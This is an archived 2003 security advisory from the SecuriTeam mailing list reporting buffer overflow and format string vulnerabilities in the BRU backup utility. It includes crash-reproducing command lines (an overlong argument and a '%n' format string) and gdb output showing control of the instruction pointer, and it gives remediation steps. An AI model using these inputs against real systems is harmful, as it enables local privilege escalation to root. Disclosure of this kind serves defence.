[UNIX] BRU Buffer Overflow and Format String Vulnerabilities

• Previous message: SecuriTeam: "[NT] ISA Server - Error Page Cross-Site Scripting (Additional Details)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 17 Jul 2003 19:57:16 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security in Canada

Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
We welcome ISPs, system integrators and IT systems resellers
to promote the most advanced vulnerability assessment solutions today.

Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

- - - - - - - - -

  BRU Buffer Overflow and Format String Vulnerabilities
------------------------------------------------------------------------

SUMMARY

 <http://www.tolisgroup.com> EST BRU(TM) Backup and Restore Utility is
"the No. 1 award winning product for Linux backup, having won more awards
and maintained a larger installed base than any other commercial Linux
backup solution. A respected industry veteran, EST has been developing
UNIX backup products since 1985". The product has been found to contain
buffer overflow and format string vulnerabilities.

DETAILS

Vulnerable systems:
 * BRU version 17.0 and prior

The 2 issues at hand can be reproduced as follows:
elguapo@gentoo elguapo $ /bru/bru `perl -e 'print "A" x 3050'`
bru: [E155] error - memory fault (SIGSEGV)

elguapo@gentoo elguapo $ /bru/bru %n%n%n%n
bru: [E155] error - memory fault (SIGSEGV)

Both issues appear to be caused by poor usage of vsprintf().

Starting program: /bin/bru %n%n%n%n%n
Program received signal SIGSEGV, Segmentation fault.
0x40071d96 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x40071d96 in vfprintf () from /lib/libc.so.6
#1 0x0805543a in step ()

Starting program: /bin/bru `perl -e 'print "A" x 3025'`
Program received signal SIGSEGV, Segmentation fault.
0x08060027 in step ()
(gdb) bt
#0 0x08060027 in step ()
Cannot access memory at address 0x41414141

These issues can easily be exploited by an attacker to gain root access.

Solution:
Upgrade to the Tolisgroup BRU or chmod -s bru.

Vendor status:
The original vendor no longer exists. The Tolisgroup's BRU is not
vulnerable by default, customers are requested to upgrade to the latest
version.

ADDITIONAL INFORMATION

The information has been provided by <mailto:dotslash@snosoft.com> KF.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] ISA Server - Error Page Cross-Site Scripting (Additional Details)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]